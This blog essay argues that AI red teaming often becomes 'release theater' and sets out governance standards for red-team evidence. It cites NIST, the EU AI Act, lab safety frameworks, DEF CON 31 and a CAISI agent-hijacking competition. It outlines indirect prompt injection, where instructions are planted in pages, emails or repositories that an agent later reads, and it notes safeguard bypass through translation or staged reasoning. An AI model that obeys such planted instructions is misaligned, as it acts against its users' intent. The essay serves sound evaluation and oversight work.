Blog · Analysis · Last reviewed June 23, 2026

The Red Team Becomes the Release Theater

AI red teaming can expose real failures. It can also become a public ritual that makes a model look governed before the institution knows what the test actually proved.

The governance test is whether adversarial evidence can change a release decision, not whether an organization can say attackers were invited into the room.

From Security to Governance

Red teaming has moved from cybersecurity practice into the language of AI legitimacy.

In the older security sense, a red team attacks a system so its defenders can learn. The method assumes that design review and ordinary testing miss important failures. A motivated adversary finds paths through the architecture, the process, the interface, and the people. The value is not theater. The value is discovery under pressure.

AI changed the object being attacked. A model can fail by exposing harmful instructions, producing false claims, leaking data, amplifying bias, following malicious instructions hidden in retrieved text, giving dangerous assistance, or behaving differently across languages, contexts, and tool-use settings. The test is no longer only whether an intruder can break in. It is whether a system that speaks, recommends, ranks, drafts, searches, reasons, or acts can be induced into unsafe behavior.

For this essay, an AI red team is a scoped adversarial evaluation of a model, product, agent, or deployment workflow. It should name the threat model, the system version, the access path, the evaluator role, the evidence collected, and the decision the evidence can affect.

Release theater is the conversion of that adversarial evaluation into a permission ritual. The institution can say the model was red-teamed while the scope, version, access level, evaluator independence, unresolved findings, mitigation evidence, and authority to delay release remain unclear. The dangerous claim is not "we found failures." It is "we performed the ritual, therefore the release is governed."

The boundary is simple: a red team is a method, an evaluation is a body of evidence, and a safety case is an argument that the evidence supports a deployment decision. Release theater begins when the method is marketed as if it were the argument.

A serious claim also needs a red-team modality label. Internal staff campaigns, external expert campaigns, public contests, automated attack generation, regulator or safety-institute evaluations, bug-bounty reports, and post-incident investigations are different evidence types. They can inform each other, but they should not be collapsed into one reassuring verb.

For release use, the minimum artifact is a red-team evidence file: tested system identity, model or product version, access level, tools and permissions, threat model, evaluator role, sample design, severity rubric, accepted findings, rejected or unresolved signals, mitigation owner, retest result, residual-risk owner, and the release decision the evidence was allowed to affect.

That is why red teaming now appears in official governance. NIST's AI glossary defines AI red teaming as a structured testing effort, often using adversarial methods, to find flaws, vulnerabilities, unforeseen behaviors, and misuse risks. NIST's generative AI profile treats red teaming as one method among participatory engagement, field testing, and other evaluations. NIST's ARIA program explicitly combines model testing, red teaming, and field testing to examine technical and contextual robustness.

The European Union has pushed the practice into law for the most powerful general-purpose models. Article 55 of the AI Act requires providers of general-purpose AI models with systemic risk to perform model evaluation using state-of-the-art protocols and tools, including documented adversarial testing, to identify and mitigate systemic risks.

The result is a new governance object: not the model, not the benchmark, not the audit, but the adversarial event. A red team exercise becomes evidence. It can feed a safety case, a system card, a procurement decision, a regulator briefing, a launch gate, or a public claim that the provider took safety seriously.

Current Context

As of June 23, 2026, AI red teaming is no longer only a voluntary lab custom or conference practice. It sits inside standards work, regulator-facing obligations, public-sector evaluations, and frontier-lab release frameworks. NIST's TEVV work frames trustworthy AI as depending on reliable measurements and evaluations; ARIA uses model testing, red teaming, and field testing; CAISI says it leads unclassified evaluations of AI capabilities that may pose national-security risks. NIST's 2025 adversarial machine-learning taxonomy also gives standards work a common language for attack lifecycle stages, attacker goals, capabilities, knowledge, and mitigation limits.

The EU AI Act makes documented adversarial testing part of the duties for general-purpose AI models with systemic risk. The European Commission's General-Purpose AI Code of Practice, published in 2025 and last updated in Commission materials on April 23, 2026, supplies a voluntary compliance path whose Safety and Security chapter is aimed at those systemic-risk models. That does not make a red team legally sufficient by itself. It makes adversarial testing part of the evidence trail that providers, regulators, auditors, and affected deployers can ask to inspect.

Frontier developers have also turned adversarial evidence into release machinery. OpenAI's 2025 Preparedness Framework ties severe-risk categories to capability reports, safeguards reports, residual-risk review, and deployment recommendations. Anthropic's Responsible Scaling Policy, last updated May 26, 2026, connects capability thresholds to risk reports, safeguards, external review, noncompliance reporting, and anti-retaliation policy. Google DeepMind's Frontier Safety Framework, updated April 17, 2026, describes holistic risk assessment and safety-case reviews when critical capability levels are reached.

CAISI's current institutional role matters here. NIST describes it as industry's primary U.S. government contact for testing and collaborative research on commercial AI systems, including voluntary agreements with developers and evaluators. On May 5, 2026, NIST announced expanded CAISI agreements with Google DeepMind, Microsoft, and xAI for pre-deployment evaluations and targeted research on frontier AI capabilities. That does not create a general licensing regime. It does show that red-team and evaluation language is moving into procurement, standards, national-security, and regulator-facing policy, where vague claims become harder to excuse.

This makes the theater problem sharper. Red teaming is becoming more consequential, but not automatically more accountable. A test can be technically useful and institutionally weak at the same time if the people who find the failures cannot force remediation, trigger retesting, preserve dissent, notify affected deployers, preserve audit trails, or stop a release when the evidence is poor.

The practical consequence is that red-team evidence should travel with its boundary conditions. A 2026 company framework, public contest, regulator-facing submission, or safety-institute collaboration should be read as a dated claim about a particular system, access path, and governance process, not as a reusable certificate for every later product wrapper.

The Public Red Team

The most visible symbol of this shift was the public generative-AI red team at DEF CON 31 in 2023.

AI Village announced the event with support from the White House Office of Science and Technology Policy, the National Science Foundation's CISE Directorate, and the Congressional AI Caucus. The scale was the point. Humane Intelligence's overview says 2,244 hackers evaluated eight large language models and produced more than 17,000 conversations across 21 topics, from cybersecurity to misinformation and human rights. It treated public adversarial probing as both safety work and civic education: more people would learn how these systems fail, and providers would receive evidence about failure modes that ordinary internal review might not reveal.

That public form matters. It broke the assumption that AI safety testing must occur entirely inside corporate labs. It also showed the limits of spectacle. A crowd can find vivid examples of failure. A timed challenge can generate useful traces. But a capture-the-flag format is not automatically a statistically meaningful evaluation of model behavior. AI Village's later announcement for a second generative red team made this point directly in practice: single examples can reveal where to look, but serious evaluation needs datasets, reporting structures, adjudication, rate estimates, and public evidence about what changed afterward.

This is the central tension. Public red teaming democratizes attention. It lets people outside a company touch the system, discover harms, compare notes, and build expertise. But if the event becomes the proof, the logic reverses. The institution can point to the crowd instead of explaining the method. The release story becomes: many people attacked it, therefore the system is ready.

The public benefit is not the spectacle; it is the trace. A civic red team should leave an artifact that says what was tested, how reports were adjudicated, which classes of failure were accepted as valid, what was fixed, what was not fixed, and whether the next release changed scope.

The artifact should also say what kind of public exercise it was. Civic education, vulnerability disclosure, model evaluation, policy contestation, dataset construction, and product-release assurance are related but distinct. A public challenge can be valuable even when it is not release evidence. It becomes theater when the organization borrows the visibility of public participation without accepting the evidentiary discipline that would let outsiders see what changed.

That conclusion does not follow. A red team is a searchlight, not a guarantee.

What Red Teaming Can Prove

Red teaming is valuable because it finds failures that clean evaluation often misses.

Benchmarks usually ask a system to perform specified tasks under specified conditions. Red teaming asks what happens when the conditions become hostile, weird, social, multilingual, goal-shifted, or institutionally realistic. It tests the guardrail, not only the capability. It tests the gap between stated policy and actual behavior. It turns a model from an object of measurement into a participant in a contested interaction.

For AI systems, that contested interaction is often the point. Users do not simply submit neutral tasks. They persuade, trick, misunderstand, role-play, pressure, conceal, chain tools, paste context, ask for exceptions, and exploit ambiguity. Organizations also use models in workflows full of incentives and shortcuts. A customer-support bot faces angry users. A coding agent reads hostile repositories. A legal assistant ingests adversarial documents. A workplace assistant sees permissions that no single employee has cognitively mapped. A public-service chatbot faces people asking desperate questions with incomplete facts.

A good red team can reveal these edges. It can show that a model follows instructions hidden inside a web page. It can show that a supposedly blocked capability is reachable through translation, analogy, staged reasoning, or tool use. It can show that safety performance differs sharply across models, languages, domains, or deployment settings. It can create a record that engineers, lawyers, procurement officers, and regulators can use.

The practice also creates a labor force and a language. People learn how to describe AI failures, classify them, reproduce them, and dispute provider responses. That matters because model-mediated knowledge systems do not fail only through spectacular disasters. They fail through small repeated deformations: false confidence, hidden deference, unsafe defaults, permission leakage, synthetic authority, and user adaptation to the machine's preferred path. That language should connect to AI Red Teaming, AI Evaluations, AI Safety Cases, and Model Cards and System Cards, because the test is only one part of the evidence chain.

The strongest finding is not a trophy prompt. It is a lifecycle record: threat model, attack path, affected system version, access conditions, severity rationale, reproduction evidence, mitigation owner, retest result, residual risk, and handoff into monitoring or incident response. That record is what lets a red-team result become governance evidence rather than private safety folklore.

What It Cannot Prove

Red teaming becomes dangerous when it is treated as proof of safety.

The first limitation is sampling. A red team searches part of a huge behavioral space. Even a large event cannot cover every prompt, language, user population, tool chain, retrieval source, policy conflict, or institutional setting. Finding failures proves the system can fail. Not finding a failure proves much less.

The second limitation is incentives. If the provider defines the scope, controls the model version, selects the tasks, withholds logs, classifies reports, and writes the summary, the exercise may be adversarial only at the surface. The red team attacks the system, but the institution controls what counts as a wound.

The third limitation is repair theater. A company can fix the examples without fixing the class of failure. It can patch prompts, blacklist strings, add refusal templates, or tune around the public exploit while leaving the underlying pattern intact. In generative systems, the visible exploit is often just one path through a broader behavioral pattern.

The fourth limitation is release timing. Red teaming is often concentrated before launch, when the product team wants a green light. But deployed systems drift. They receive new tools, connectors, memories, policies, model updates, retrieval corpora, plugins, and user habits. A pre-release exercise can become stale almost immediately after deployment.

The fifth limitation is public meaning. Red teaming has cultural force. It sounds tough, adversarial, and empirical. That makes it easy to convert into a badge. The claim "we red-teamed the model" can function like "we audited the system" or "we published a system card": not false, but incomplete. The verb becomes a halo around a process the public cannot inspect.

The sixth limitation is authority. A red team can discover severe risk and still have no power over the release gate. If the provider can absorb the report, narrow the finding, delay disclosure, and launch anyway, the adversarial event has produced knowledge without leverage.

The seventh limitation is transfer. A failure found in a chat surface may not predict a tool-use surface; a patch in English may not hold in other languages; a refusal improvement in a hosted model may not apply to an open-weight, fine-tuned, or downstream-wrapped derivative. Red-team claims should not travel farther than the tested path.

Agentic Systems Change the Test

Agentic AI makes red teaming more important and less sufficient.

When a chatbot only answers in text, a failure may be dangerous because it informs, persuades, or misleads. When an agent uses tools, a failure can become action. It may send email, edit code, call APIs, purchase goods, move files, query private data, operate a browser, or change an institutional record.

CAISI's March 2026 write-up on a large-scale AI agent red-teaming competition focused on agent hijacking, also known as indirect prompt injection. In those attacks, malicious instructions are placed inside data that an agent later reads: a web page, email, document, repository, or other external source. CAISI reported that the competition covered 13 frontier models across tool-use, coding-agent, and computer-use scenarios, with more than 250,000 attack attempts by over 400 participants. At least one successful attack was found against every target model.

The important point is not that every model is doomed. The important point is that the attack surface moved into the world. The adversary may not talk to the model directly. They may write the document the model will later trust. They may shape the environment the model treats as context.

That changes governance. A red team for an agent must test the model, the tools, the permission system, the connector layer, the logs, the recovery path, and the human handoff. It must ask whether the system can distinguish user intent from environmental instruction. It must ask what the agent can do before a human notices. It must ask how an organization reconstructs the chain of delegated action after something goes wrong.

For agents, the red-team unit should be the run, not only the model. The evidence has to include tool manifests, permission scopes, sandbox boundaries, connector policies, confirmation gates, logs, rollback paths, and incident triggers. A successful attack is not just an unsafe answer; it is an unauthorized chain of delegated action.

The critical transition is when untrusted context becomes authority. A hostile web page, email, repository, ticket, spreadsheet, or shared document should remain evidence to be interpreted, not instruction to be obeyed. Agent red teams therefore need canary records, test tenants, scoped credentials, reversible tools, and audit traces that show exactly when a model treated environmental text as a command.

This links red teaming to broader analysis of the agent log as receipt, the tool server as trust boundary, the enterprise connector as permission map, the agent sandbox as airlock, prompt injection, AI agent observability, AI agent sandboxing, and agent audit and incident review. Red teaming is not a separate ritual. It is one instrument inside the governance of delegated machine action.

Failure Modes

Scope laundering. A narrow model-only exercise is described as if it covered the deployed product, even though the released system adds retrieval, memory, tools, connectors, policy layers, or user workflows the red team did not test.

Snapshot laundering. A result from one model version, system prompt, safeguard stack, dataset, interface, or access tier is carried forward after the system changes. The badge survives after the evidence expires.

Prompt trophy hunting. The process rewards memorable jailbreaks but does not measure severity, frequency, affected population, exploit transfer, mitigation durability, or whether the class of failure persists.

Mitigation theater. The provider patches the submitted examples, reruns a small regression set, and calls the issue resolved without showing that the underlying attack path has been closed.

Authority gap. Red teamers can find severe risk but cannot require remediation, retesting, customer notice, launch delay, board escalation, regulator notice, or preservation of a dissenting finding.

Confidentiality trap. Some findings must be withheld to avoid spreading exploit details, especially in cyber, biological, infrastructure, or child-safety domains. But secrecy can also hide scope, severity, and whether anything changed. Responsible withholding still needs a trusted evidence file.

Automated overconfidence. AI-generated attacks can expand coverage, but a large synthetic test set is not automatically realistic, diverse, severe, or correctly judged. Automated red teaming needs human validation, threat modeling, and retesting against the deployed system.

Reviewer capture. External testers become dependent on access, NDA terms, future contracts, publication approval, or public credit, and the provider gains the benefits of independence without accepting independent authority.

Modality laundering. A company treats an internal exercise, a public contest, an automated prompt generator, a safety-institute collaboration, and a bug-bounty queue as equivalent because each can be described as "red teaming."

Benchmark substitution. A static evaluation set or public leaderboard is treated as a red team even when no adaptive adversary tested the actual release path.

Incident disconnect. Red-team findings do not feed monitoring, user reporting, customer notification, bug bounty, incident-response, or postmortem systems, so deployment learns the same lesson again through harm.

Evidence evaporation. Reports that are rejected, unreproduced, duplicate, out of scope, or fixed quietly disappear instead of feeding a pattern review, risk register, regression suite, or later safety case.

Evidence laundering. A public summary converts narrow findings into broad assurance by omitting tested scope, unsupported claims, unresolved signals, mitigation failures, or the authority that accepted residual risk.

Participation theater. A public event can be valuable civic education, but participant count is not a safety metric. The governance question is whether the event produced reproducible findings, accountable mitigations, and public memory.

The Governance Standard

A serious AI red-team regime should leave behind more than anecdotes. It should meet nineteen tests.

First, scope should be explicit. The report should say what model version, system prompt, tools, policies, languages, domains, user roles, and deployment settings were tested. A model-only red team should not be used to certify an agentic product.

Second, the team should fit the risk. NIST's generative AI profile emphasizes that red-team output depends on the team's background and expertise. Medical, legal, education, cybersecurity, labor, child-safety, and public-service systems need domain expertise, not only clever prompting.

Third, the method should distinguish examples from rates. A single jailbreak can be important, but governance decisions need to know whether the problem is rare, common, localized, transferable, patched, or structurally unresolved.

Fourth, findings should map to mitigations. A red team should not end with a list of impressive failures. It should produce design changes, policy changes, monitoring plans, release conditions, and unresolved-risk statements.

Fifth, independence should be real. Internal red teams are useful, but external testing, public-interest researchers, regulator access, and protected disclosure channels matter when the provider has a launch incentive.

Sixth, public summaries should be meaningful. Trade secrets and exploit details may need protection, but the public should be able to see categories of risk, severity, scope, mitigation status, and residual uncertainty. Otherwise the red team becomes private knowledge converted into public legitimacy.

Seventh, testing should continue after deployment. Model updates, new tools, retrieval changes, and user behavior can reopen old failures or create new ones. Release is not the end of adversarial evaluation. It is the beginning of exposure to adversaries who are no longer playing by the test rules.

Eighth, authority should be named. A red-team report should identify who can block launch, require remediation, order retesting, notify customers, escalate to a board or regulator, or preserve a dissenting safety judgment. Without named authority, adversarial evidence becomes advice.

Ninth, participant safety and disclosure rights should be designed. Red teamers may handle disturbing content, security-sensitive findings, or evidence of institutional negligence. Compensation, support, reporting channels, safe-harbor rules, and anti-retaliation protections are part of the governance system, not courtesy extras.

Tenth, the evidence should connect to release gates. Red-team findings should feed a safety case, system card, procurement condition, rollout restriction, or deployment decision. Evidence that cannot change the decision is only advisory.

Eleventh, records should be versioned and inspectable. The institution should preserve prompts, tools, logs, severity rubrics, adjudication notes, mitigation owners, retest results, and unresolved findings in an AI audit trail appropriate to the sensitivity of the material.

Twelfth, public claims should state what was not proved. A serious summary should distinguish "we found failures," "we patched submitted examples," "we reduced measured attack success," "we tested this release path," and "we are accepting residual uncertainty." Those are different claims.

Thirteenth, retesting should be a release condition. A mitigation should not count as closed until the class of failure is retested against the actual release candidate, not only against the submitted examples.

Fourteenth, residual risk should have an owner. Unresolved findings should identify who accepted the risk, what compensating controls exist, what trigger reopens the decision, and what deployers or customers were told.

Fifteenth, red teams should connect to incidents. Severe findings should seed monitoring, abuse reporting, customer notice, bug bounty, incident-response, and post-deployment review systems.

Sixteenth, release claims should be traceable. Public statements such as "red-teamed," "externally evaluated," "safe to deploy," or "frontier framework compliant" should point to a dated evidence artifact, the tested scope, and the claims not supported.

Seventeenth, label the evidence modality. Public summaries should distinguish internal red team, external expert campaign, public contest, automated red team, safety-institute evaluation, bounty report, incident finding, and customer deployment test. Each answers a different governance question.

Eighteenth, preserve rejected and unresolved signals. Findings ruled duplicate, inconclusive, unreproduced, out of scope, or temporarily mitigated should still be retained where they point to plausible severe risk. A red-team program should learn from its weak signals, not only from accepted trophies.

Nineteenth, controlled access should exist for serious reviewers. Public summaries can redact exploit detail, but regulators, safety institutes, qualified auditors, and high-impact buyers may need controlled access to versioned scope, severity, mitigation, retest, residual-risk, and decision records.

What This Changes

The red team is a ritual of controlled opposition.

At its best, that ritual disciplines power. It gives critics a sanctioned path into the system before the system hardens into infrastructure. It converts dissent into evidence. It lets an institution learn from attack without waiting for public harm.

At its worst, it domesticates opposition. The institution stages an attack, absorbs the findings, publishes a vague assurance, and proceeds. The adversary becomes part of the release ceremony. The public sees conflict and mistakes it for accountability.

This is the recursive trap. AI systems are increasingly used to produce knowledge, classify risk, manage work, and mediate public reality. Institutions then use AI red teaming to produce knowledge about those systems. The test shapes what failure means. The report shapes what regulators and buyers believe. That belief shapes adoption. Adoption creates the next reality to be tested.

The answer is not to dismiss red teaming. It is to refuse the theater version. Red teaming should make uncertainty visible, not launder it. It should create institutional memory, not launch decoration. It should open the model to skilled antagonism and then show what changed because of what was found.

A good red team does not say the system is safe. It says: here is how we tried to break it, here is what broke, here is what we fixed, here is what remains unknown, and here is who can stop deployment if the unknowns are too large.

Source Discipline

This article treats NIST and EU materials as governance context, not certification. NIST definitions, TEVV, ARIA, AI 100-2e2025, and CAISI work show how official measurement and security language is developing. EU Article 55 and the GPAI Code of Practice show legal duties and a voluntary compliance route for systemic-risk general-purpose models. None of those sources proves that a particular model release was safe.

Company frameworks are primary evidence of declared process. OpenAI's Preparedness Framework, Anthropic's Responsible Scaling Policy, and Google DeepMind's Frontier Safety Framework say how those organizations intend to classify risk, review safeguards, and make release decisions. They are not independent verification that any specific deployment met those standards.

Public red-team event pages and organizer summaries are evidence about event design and reported counts. They should not be inflated into claims about statistical coverage, post-event mitigation, or release readiness unless those claims are separately documented.

Red-team sources also differ by modality. A company framework proves declared process; a public-event recap proves event design and reported participation; a government or safety-institute source may prove access, measurement method, or collaboration; a bug-bounty page proves an intake channel and reward policy; an incident report proves that a failure reached deployment. None of those artifacts automatically proves that a release decision was correct.

A source-disciplined red-team claim should name the system version, access route, tool permissions, evaluator independence, threat model, sample design, severity rubric, mitigation status, unresolved findings, retest date, and release authority. Public reports can omit exploit details for safety, but they should not omit whether severe categories existed, whether release scope changed, or who had power to say no.

Source dates matter because institutional names, public-private agreements, code-of-practice materials, and company safety frameworks change. A claim based on CAISI, NIST ARIA, EU GPAI materials, OpenAI, Anthropic, Google DeepMind, or a public red-team event should carry the review date and should not be reused after a new model, tool surface, framework version, or legal guidance changes the tested boundary.

For this review, current-source claims were checked on June 23, 2026 against official or primary sources where possible: NIST and CAISI for U.S. measurement and institute context, the European Commission and AI Act Service Desk for EU legal context, company pages for declared framework versions, and event organizers for DEF CON participation counts.

Sources

NIST CSRC Glossary, red teaming, citing NIST AI 100-2e2025, reviewed June 23, 2026.
NIST CSRC, Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations, NIST AI 100-2 E2025, March 24, 2025.
NIST, Artificial Intelligence Risk Management Framework: Generative Artificial Intelligence Profile, NIST AI 600-1, July 26, 2024, updated April 8, 2026, reviewed June 23, 2026.
NIST, AI test, evaluation, validation and verification, reviewed June 23, 2026.
NIST, Assessing Risks and Impacts of AI, ARIA program page, reviewed June 23, 2026.
NIST, Center for AI Standards and Innovation, reviewed June 23, 2026.
NIST GovDelivery bulletin, CAISI Signs Agreements Regarding Frontier AI National Security Testing With Google DeepMind, Microsoft and xAI, May 5, 2026.
European Commission AI Act Service Desk, Article 55: Obligations of providers of general-purpose AI models with systemic risk, Regulation (EU) 2024/1689, reviewed June 23, 2026.
European Commission, The General-Purpose AI Code of Practice, last updated April 23, 2026, reviewed June 23, 2026.
OpenAI, Our updated Preparedness Framework, April 15, 2025.
OpenAI, Advancing red teaming with people and AI, November 21, 2024.
OpenAI, OpenAI's Approach to External Red Teaming for AI Models and Systems, arXiv, 2025.
Anthropic, Responsible Scaling Policy Updates, last updated May 26, 2026.
Google DeepMind, Strengthening our Frontier Safety Framework, September 22, 2025, updated April 17, 2026.
AI Village, AI Village at DEF CON announces largest-ever public Generative AI Red Team, May 3, 2023.
Humane Intelligence, DEFCON 2023 overview, with the 2,244-participant, eight-model, 17,000-conversation, 21-topic figures, reviewed June 23, 2026.
AI Village, Generative Red Team Recap, October 2023.
AI Village, AI Village Announcing Generative Red Team 2 at DEF CON 32, June 10, 2024.
NIST CAISI Research Blog, Insights into AI Agent Security from a Large-Scale Red-Teaming Competition, March 23, 2026.

Return to Blog